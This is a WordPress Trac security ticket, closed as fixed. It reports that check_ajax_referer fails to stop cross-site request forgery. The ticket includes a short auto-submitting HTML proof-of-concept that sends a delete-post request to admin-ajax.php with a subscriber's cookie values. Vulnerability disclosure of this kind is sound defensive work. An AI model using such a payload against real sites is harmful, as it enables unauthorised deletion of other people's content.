Opened 17 years ago
Closed 17 years ago
#4939 closed defect (bug) (fixed)
check_ajax_referer does not protect from CSRF at all
Reported by: | xknown | Owned by: | |
---|---|---|---|
Milestone: | 2.3 | Priority: | high |
Severity: | normal | Version: | 2.3 |
Component: | Security | Keywords: | |
Focuses: | Cc: |
Description
check_ajax_referer
only checks if the incoming request contains valid user credentials but wp_get_current_user
still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks.
<html> <body> <form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php"> <input type="text" name="action" value="delete-post" /> <input type="text" name="id" value="Post_ID" /> <input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" /> </form> <script>document.forms[0].submit();</script> </body> </html>
Attachments (2)
Change History (5)
Note: See
TracTickets for help on using
tickets.
Set current user in check_ajax_referer.